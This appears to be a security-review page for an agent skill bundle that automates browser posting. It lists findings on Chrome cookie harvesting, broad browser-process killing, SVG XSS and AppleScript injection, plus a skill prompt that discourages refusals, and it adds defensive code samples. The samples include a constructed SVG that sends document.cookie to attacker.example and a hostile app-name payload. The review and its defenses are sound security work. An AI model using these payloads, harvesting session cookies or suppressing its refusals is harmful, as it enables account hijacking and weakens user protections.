Baoyu Skills

Security checks across malware telemetry and agentic risk

Overview

This broad content-automation bundle is mostly coherent, but it needs Review because some subskills can reuse browser sessions, store login cookies, automate account actions, and terminate browser debug processes.

Install only if you are comfortable granting a single skill bundle broad browser and account automation powers. Use dedicated Chrome profiles, avoid reusing your normal logged-in browser session, review and delete stored cookie/session files when done, and do not allow automatic browser-process killing around unsaved work. Treat the posting subskills as capable of changing real account state, including drafts or public posts.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Least Privilege: Underdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
Findings (33)

MCP Least Privilege

Medium
Confidence
84% confidence
Finding
The skill metadata advertises installation and execution of Bun/Node-based scripts and describes capabilities that inherently use shell execution, environment variables, and network access, but it does not declare any permissions for those capabilities. This creates a transparency and policy-enforcement gap: users and any permission framework cannot accurately assess or constrain what the skill may access, which is especially relevant because several subskills fetch remote content or publish to external platforms.

Context-Inappropriate Capability

High
Confidence
98% confidence
Finding
When inlineSvg is enabled, the code fetches remote SVG text and injects it directly into the DOM via outerHTML without sanitization. SVG is active content and can contain script-capable elements, event handlers, foreignObject HTML, or external references, so a malicious or compromised PlantUML server—or attacker-controlled serverUrl—can trigger XSS in the rendering context.

Context-Inappropriate Capability

Medium
Confidence
98% confidence
Finding
The prompt explicitly tells the model to avoid refusal for sensitive or copyrighted figures and instead generate stylistically similar alternatives. That weakens normal safety boundaries around protected or sensitive depictions and introduces an unnecessary policy-bypass behavior for a simple article-illustration skill.

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
The preset hard-codes Doraemon characters as the default output style, which can cause the skill to generate copyrighted character depictions without the user explicitly requesting them. In a comic-generation context, this creates a foreseeable intellectual-property compliance risk because normal use of the preset will steer outputs toward protected characters by default.

Description-Behavior Mismatch

Medium
Confidence
95% confidence
Finding
This client does more than transient web fetching: it manages Google session cookies, refreshes them in the background, and persists updated credentials to disk. In a skill advertised as web scraping/fetching, this expands the trust boundary and increases the chance of credential misuse, account persistence, and unintended access to a user's Google session.

Context-Inappropriate Capability

Medium
Confidence
97% confidence
Finding
The code writes sensitive Google authentication cookies to a local file via write_cookie_file(...). Persisting live session cookies creates a credential theft target on disk; any local compromise, overly broad file permissions, logs, backups, or other skills/processes could reuse the cookies to impersonate the user.
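The finding above and the Overview's advice to "review and delete stored cookie/session files when done" translate into two concrete controls: create the cookie file with owner-only permissions from the first byte, and audit the skill's working directory for session files that are readable by others or older than one working session. The example below is added here for illustration and is not the skill's own write_cookie_file; the file layout, the 24-hour age threshold and the sample cookie values are assumptions, and the cookie records are constructed.

```python
"""Cookie-file hygiene for skills that persist browser session cookies (added example)."""
import json
import os
import stat
import tempfile
import time
from pathlib import Path
from typing import Dict, List

# Constructed sample; real session cookies would authenticate as the user.
SAMPLE_COOKIES: List[Dict[str, str]] = [
    {"name": "example_session", "value": "REDACTED-EXAMPLE", "domain": ".example.com"},
]


def write_cookie_file_securely(path: Path, cookies: List[Dict[str, str]]) -> None:
    """Create the file with mode 0600 at open time (no window where it is group/world
    readable), write to a temp name, then atomically rename into place."""
    tmp = path.with_suffix(path.suffix + ".tmp")
    fd = os.open(tmp, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        json.dump(cookies, f)
    os.chmod(tmp, 0o600)          # belt and braces in case umask/ACLs loosened it
    os.replace(tmp, path)


def audit_cookie_files(directory: Path, max_age_hours: float = 24.0) -> List[dict]:
    """Report cookie/session files that others can read or that outlived one session."""
    findings = []
    now = time.time()
    for p in directory.rglob("*"):
        if not p.is_file() or not any(k in p.name.lower() for k in ("cookie", "session")):
            continue
        st = p.stat()
        problems = []
        if st.st_mode & (stat.S_IRWXG | stat.S_IRWXO):           # any group/other bits set
            problems.append(f"mode {stat.filemode(st.st_mode)}")
        age_h = (now - st.st_mtime) / 3600
        if age_h > max_age_hours:
            problems.append(f"age {age_h:.1f}h")
        if problems:
            findings.append({"path": str(p), "problems": problems})
    return findings


def delete_cookie_files(findings: List[dict]) -> int:
    """Unlink every flagged file; returns how many were removed."""
    removed = 0
    for f in findings:
        os.remove(f["path"])
        removed += 1
    return removed


def demo() -> dict:
    """Exercise both paths in a scratch directory: one file written correctly,
    one constructed leftover that is world-readable and two days old."""
    d = Path(tempfile.mkdtemp(prefix="skill-cookies-"))
    good = d / "gemini_cookies.json"
    write_cookie_file_securely(good, SAMPLE_COOKIES)
    before = audit_cookie_files(d)
    bad = d / "old_session.json"
    bad.write_text("{}")
    os.chmod(bad, 0o644)
    os.utime(bad, (time.time() - 48 * 3600,) * 2)
    found = audit_cookie_files(d)
    return {
        "good_mode": stat.S_IMODE(good.stat().st_mode),
        "audit_before": before,
        "flagged": [f["path"] for f in found],
        "problem_count": len(found[0]["problems"]) if found else 0,
        "deleted": delete_cookie_files(found),
        "good_survives": good.exists(),
        "bad_survives": bad.exists(),
    }


if __name__ == "__main__":
    print(demo())
```

Run the audit as a post-step of any subskill that logs in; the mode check catches the "overly broad file permissions" case and the age check catches files left behind after a one-off conversion.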

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
The background auto-refresh task continuously rotates Google session cookies, helping maintain a long-lived authenticated session without fresh user action. That increases the blast radius of compromise because stolen cookies remain usable longer and the skill effectively sustains account access over time.

Description-Behavior Mismatch

High
Confidence
99% confidence
Finding
This code programmatically extracts Google/Gemini session cookies from Chrome via the DevTools Protocol and then persists them to disk with write_cookie_file. Those cookies can authenticate requests as the user, enabling account/session hijacking and unauthorized access to Gemini or related Google web sessions without normal credential entry.

Context-Inappropriate Capability

High
Confidence
99% confidence
Finding
The function discoverRunningChromeDebugPort plus fetch_cookies_from_existing_chrome attaches to arbitrary running Chrome debug sessions and harvests cookies for google.com/accounts/gemini URLs. Reusing an existing browser session in this way bypasses normal trust boundaries and can steal active authenticated sessions from a user or another process.

Description-Behavior Mismatch

Medium
Confidence
96% confidence
Finding
The script does substantially more than webpage fetching: it loads, stores, updates, and lists local chat sessions containing user and model message history. In an agent-skill context, hidden persistence expands data retention and exposure beyond user expectations, creating privacy and data-leak risk if sensitive prompts or outputs are later enumerated or accessed by other workflows.

Description-Behavior Mismatch

Medium
Confidence
94% confidence
Finding
The usage and option handling expose login, cookie refresh, and Chrome profile/debug-session reuse behavior that is not reflected in the skill's stated purpose of web fetching. In practice this can access or reuse authenticated browser state, broadening privileges and risking unintended account/session exposure when invoked by an agent or user who expects only content retrieval.

Context-Inappropriate Capability

Medium
Confidence
95% confidence
Finding
This code deliberately searches common Chrome user-data directories, reads DevToolsActivePort files, inspects process listings, and attaches to any locally running Chrome instance exposing the DevTools protocol. That creates a powerful ambient-authority boundary break: the skill can inherit an already-authenticated browser context, access pages, cookies, local session state, and interact with tabs the user did not explicitly open for the skill. In the context of a web-scraping skill, this is especially dangerous because it normalizes silent reuse of an existing browser session rather than launching an isolated profile.

Description-Behavior Mismatch

Medium
Confidence
84% confidence
Finding
The tool includes a browser-based login/cookie refresh workflow that is not reflected in the declared X-to-Markdown conversion purpose. In an agent skill context, undisclosed authentication flows are risky because they can cause users to grant access to account session data and enable authenticated scraping beyond what a simple converter would reasonably require.

Context-Inappropriate Capability

Medium
Confidence
89% confidence
Finding
The script persists a consent record and, by design of the surrounding workflow, relies on stored authenticated cookie state for later use. In a content-conversion skill, local persistence of account-related state increases the attack surface: other local processes or later runs may reuse that state, and users may not understand that a one-time conversion created durable sensitive artifacts.

Description-Behavior Mismatch

Medium
Confidence
90% confidence
Finding
This code can discover an already-running local Chrome instance via DevToolsActivePort or process inspection, then connect to its CDP websocket and create or attach to tabs. That goes well beyond a narrow X-post-to-Markdown workflow and can grant access to the user's authenticated browser context, page contents, cookies/session-backed actions, and other sensitive local browsing state if the surrounding skill invokes it.

Context-Inappropriate Capability

Medium
Confidence
86% confidence
Finding
The module enumerates host Chrome profile locations and inspects the local process list to locate debugging ports. For a Markdown conversion skill, this is an unnecessary host reconnaissance capability that can be used to discover and later access browser sessions outside the user's intended task, increasing privacy and account-compromise risk.

Context-Inappropriate Capability

Medium
Confidence
84% confidence
Finding
The skill instructs the agent to invoke external tooling via `bun` or `npx -y bun`, which expands the trusted computing boundary and can introduce supply-chain and execution risks. In particular, falling back to `npx` may fetch and execute packages at runtime, and processing attacker-controlled files through external scripts can expose the environment to unsafe code paths or unexpected script behavior.

Context-Inappropriate Capability

Medium
Confidence
96% confidence
Finding
This code fetches SVG content from an external PlantUML server and injects the returned text directly into the DOM via outerHTML without sanitization. If the PlantUML server, the network path, or serverUrl configuration is compromised, attacker-controlled SVG/HTML can execute script or abuse SVG event handlers, causing XSS in the rendering context and also exfiltrating sensitive diagram contents to a third-party service.
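Both PlantUML findings come down to the same sink: remote SVG text placed into the document with outerHTML. The safest fix is not to inline it at all (render it through an img element or a sandboxed iframe, where SVG script and event handlers do not run). When the diagram must be inlined, the text has to be parsed and reduced to an allowlist of drawing elements first. The sanitizer below is an added example written for this page, not the skill's code; it assumes PlantUML output only needs the listed primitives, and the malicious SVG is constructed. It uses the standard-library XML parser, which is not hardened against entity-expansion attacks, so a production version should parse with defusedxml.

```python
"""Allowlist sanitizer for SVG fetched from an untrusted PlantUML server (added example)."""
import re
import xml.etree.ElementTree as ET  # production: defusedxml (expat is not hardened against entity bombs)
from typing import List, Tuple

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

# Assumed sufficient for PlantUML output. script, foreignObject, image, use,
# animate* and anything else are dropped wholesale.
ALLOWED_TAGS = frozenset({
    "svg", "g", "defs", "title", "desc", "a", "path", "rect", "circle", "ellipse",
    "line", "polyline", "polygon", "text", "tspan", "clipPath",
    "linearGradient", "radialGradient", "stop",
})
_URL_ARG = re.compile(r"url\(\s*[\"']?([^\"')]*)")


def _local(qname: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return qname.rsplit("}", 1)[-1]


def _has_external_url(css: str) -> bool:
    """True for url(https://...) or @import; url(#gradient) fragment refs are fine."""
    return "@import" in css or any(not a.strip().startswith("#") for a in _URL_ARG.findall(css))


def _scrub(elem: ET.Element, removed: List[str]) -> None:
    for child in list(elem):
        if _local(child.tag) not in ALLOWED_TAGS:
            removed.append(f"element:{_local(child.tag)}")
            elem.remove(child)
        else:
            _scrub(child, removed)
    for attr in list(elem.attrib):
        name = _local(attr).lower()
        value = elem.attrib[attr].strip().lower()
        if name.startswith("on"):                               # onload=, onclick=, ...
            reason = "event-handler"
        elif name == "href" and not value.startswith("#"):      # javascript: or remote targets
            reason = "external-href"
        elif name == "style" and _has_external_url(value):      # CSS fetches to a third party
            reason = "style-url"
        else:
            continue
        removed.append(f"attr:{_local(attr)}:{reason}")
        del elem.attrib[attr]


def sanitize_svg(svg_text: str) -> Tuple[str, List[str]]:
    """Return (clean_svg, list_of_removed_items). Raises ValueError if the root is not <svg>."""
    root = ET.fromstring(svg_text)
    if _local(root.tag) != "svg":
        raise ValueError("response is not an SVG document")
    removed: List[str] = []
    _scrub(root, removed)
    return ET.tostring(root, encoding="unicode"), removed


# Constructed sample of what a hostile server (or attacker-controlled serverUrl) could return.
MALICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <rect x="1" y="1" width="10" height="10" style="fill:url(https://attacker.example/track)"/>
  <image xlink:href="https://attacker.example/beacon.png"/>
  <foreignObject><body xmlns="http://www.w3.org/1999/xhtml"><iframe src="javascript:alert(2)"/></body></foreignObject>
  <a xlink:href="javascript:alert(3)"><text x="2" y="8">Diagram</text></a>
</svg>"""

if __name__ == "__main__":
    clean, dropped = sanitize_svg(MALICIOUS_SVG)
    print(clean)
    print("removed:", dropped)
```

Log the `removed` list: a PlantUML server that suddenly starts returning script or foreignObject elements is itself a signal worth alerting on.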

Intent-Code Divergence

Medium
Confidence
96% confidence
Finding
The CLI advertises `--submit` as controlling whether the article is saved as a draft, but `postArticle()` unconditionally clicks `#js_submit button` and saves anyway. In an automation skill that posts to a real WeChat Official Account, this can cause unintended publication workflow actions, account-side state changes, and accidental draft creation even when the caller expected a dry run or content preparation only.

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
The skill instructs the agent to automatically run `pkill -f` against Chrome/Chromium processes when troubleshooting CDP connectivity. That expands the skill from posting to Weibo into host process management and can terminate unrelated browser sessions, causing denial of service, user disruption, and possible data loss in open tabs or unsaved work. In this context, the capability is not necessary to compose a post and is especially risky because it is framed as an automatic recovery action without user confirmation.

Intent-Code Divergence

Medium
Confidence
87% confidence
Finding
The documentation creates a misleading safety boundary by stating the scripts only fill content for manual publishing, while nearby instructions authorize automatic termination of Chrome CDP instances. This inconsistency can cause an agent or user to underestimate the operational impact of the skill and permit destructive side effects beyond the stated purpose. Misrepresented capabilities are dangerous in agentic systems because they weaken informed consent and can bypass user expectations about what the skill may do on the local machine.

Context-Inappropriate Capability

Medium
Confidence
95% confidence
Finding
The macOS AppleScript embeds the user-supplied app name directly into a quoted script string without escaping. A crafted app name containing quotes or AppleScript syntax can break out of the string literal and inject arbitrary AppleScript commands, potentially controlling other applications or triggering unwanted local actions when osascript runs.
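The injection in the finding above is a string-literal breakout: a name such as `Safari" to quit` closes the quoted literal and the rest is parsed as AppleScript. The example below, added for this page and not taken from the skill, shows the flawed interpolation next to two fixes: escaping the literal, and (preferred) keeping the script constant and passing the name to osascript as a positional argument that the script reads from argv. The function names are assumptions; running the commands only makes sense on macOS, so the block only builds them.

```python
"""Passing a user-supplied app name to osascript without AppleScript injection (added example)."""
import subprocess
from typing import List


def activate_cmd_vulnerable(app_name: str) -> List[str]:
    """Mirrors the flawed pattern: the name is pasted straight into the script text."""
    script = f'tell application "{app_name}" to activate'
    return ["osascript", "-e", script]


def escape_applescript_string(s: str) -> str:
    """Escape for use inside an AppleScript double-quoted literal (backslash first)."""
    return s.replace("\\", "\\\\").replace('"', '\\"')


def activate_cmd_escaped(app_name: str) -> List[str]:
    """Acceptable: the literal can no longer be closed early."""
    script = f'tell application "{escape_applescript_string(app_name)}" to activate'
    return ["osascript", "-e", script]


# Constant script; the app name never touches the source text.
ACTIVATE_SCRIPT = """on run argv
    set appName to item 1 of argv
    tell application appName to activate
end run"""


def activate_cmd_argv(app_name: str) -> List[str]:
    """Preferred: osascript hands extra arguments to the script's argv as data."""
    return ["osascript", "-e", ACTIVATE_SCRIPT, app_name]


def run(cmd: List[str]) -> None:
    """Execute the built command (macOS only); list form avoids a shell on the way in."""
    subprocess.run(cmd, check=True)


if __name__ == "__main__":
    payload = 'Safari" to quit\ntell application "Finder'   # constructed hostile app name
    for build in (activate_cmd_vulnerable, activate_cmd_escaped, activate_cmd_argv):
        print(build.__name__, "->", build(payload))
```

The same rule applies to the Cmd+V keystroke helper: any application name or text that reaches `osascript` should arrive through argv, not through f-string interpolation into `tell` or `keystroke` statements.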

Intent-Code Divergence

Medium
Confidence
93% confidence
Finding
The skill claims posting requires user review and manual publication, yet separately instructs the agent to automatically kill Chrome/Chromium processes and retry without asking. That creates an undocumented side effect on the local system, violating user expectation and allowing the skill to disrupt unrelated browser sessions or other automation using the same debug flag.

Context-Inappropriate Capability

Medium
Confidence
96% confidence
Finding
The documented recovery command uses broad process-kill patterns against any local Chrome or Chromium instance with a remote debugging port. For a content-posting skill, that exceeds the minimum required capability and can terminate unrelated browser sessions, automation workflows, or work in progress, causing denial of service and possible data loss.
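The three pkill findings share one remedy: the skill should only ever terminate the browser it started, identified by PID and by the dedicated `--user-data-dir` it launched with, rather than pattern-matching every Chrome on the host. The example below is added for this page and is not the skill's code. It assumes Chrome accepts the usual `--user-data-dir` and `--remote-debugging-port` flags; because the verifier has no browser, the demo stands in a sleeping Python process carrying the profile marker (constructed) for the owned browser and one without it for the user's own session.

```python
"""Scoped browser cleanup: kill only the Chrome this skill launched (added example)."""
import os
import signal
import subprocess
import sys
import tempfile
import time
from pathlib import Path
from typing import List, Optional


def read_cmdline(pid: int) -> Optional[str]:
    """Command line of a live process via /proc (Linux) or `ps` (macOS); None if it is gone."""
    proc = Path(f"/proc/{pid}/cmdline")
    try:
        if proc.exists():
            return proc.read_bytes().replace(b"\0", b" ").decode(errors="replace")
        out = subprocess.run(["ps", "-p", str(pid), "-o", "args="],
                             capture_output=True, text=True, check=False)
        return out.stdout.strip() or None
    except OSError:
        return None


def isolated_chrome_cmd(chrome_binary: str, profile_dir: Path, port: int) -> List[str]:
    """A dedicated profile dir keeps the user's logged-in session out of reach, and its
    path doubles as the ownership marker checked before any kill."""
    return [chrome_binary, f"--user-data-dir={profile_dir}",
            f"--remote-debugging-port={port}", "--no-first-run"]


def terminate_owned(pid: int, marker: str, timeout: float = 5.0) -> bool:
    """SIGTERM `pid` only if its command line still carries `marker`; any other
    process is left untouched and False is returned. Escalates to SIGKILL after `timeout`."""
    cmdline = read_cmdline(pid)
    if cmdline is None or marker not in cmdline:
        return False
    os.kill(pid, signal.SIGTERM)
    deadline = time.time() + timeout
    while time.time() < deadline:
        try:
            reaped, _ = os.waitpid(pid, os.WNOHANG)   # our own child: reap it
            if reaped == pid:
                return True
        except ChildProcessError:                     # not our child: watch it disappear instead
            if read_cmdline(pid) is None:
                return True
        time.sleep(0.05)
    os.kill(pid, signal.SIGKILL)
    return True


def demo() -> dict:
    """Constructed stand-ins: a sleeper tagged with our profile marker plays the owned
    browser, an untagged sleeper plays the user's browser that pkill -f would also hit."""
    profile_dir = Path(tempfile.mkdtemp(prefix="skill-profile-"))
    marker = f"--user-data-dir={profile_dir}"
    sleeper = [sys.executable, "-c", "import time; time.sleep(60)"]
    owned = subprocess.Popen(sleeper + [marker])
    bystander = subprocess.Popen(sleeper)
    try:
        result = {
            "owned_terminated": terminate_owned(owned.pid, marker),
            "bystander_terminated": terminate_owned(bystander.pid, marker),
            "bystander_still_alive": bystander.poll() is None,
        }
    finally:
        bystander.kill()
        bystander.wait()
        if owned.poll() is None:
            owned.kill()
            owned.wait()
    return result


if __name__ == "__main__":
    print(isolated_chrome_cmd("google-chrome", Path("/tmp/skill-profile"), 9222))
    print(demo())
```

Recovery from a stuck CDP connection then becomes "terminate our PID if it still carries our marker, relaunch with the same profile dir", with no broad `pkill -f` and no effect on browsers the skill did not start.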

Context-Inappropriate Capability

Medium
Confidence
91% confidence
Finding
This script performs real OS-level keystroke injection into whichever app is frontmost, and on macOS can first activate an arbitrary named application before sending Cmd+V. That gives the skill the ability to drive unrelated desktop applications outside the browser/session boundary, which can cause unintended actions or paste sensitive clipboard contents into the wrong target if misused or invoked in the wrong context.

VirusTotal

VirusTotal findings are pending for this skill version.
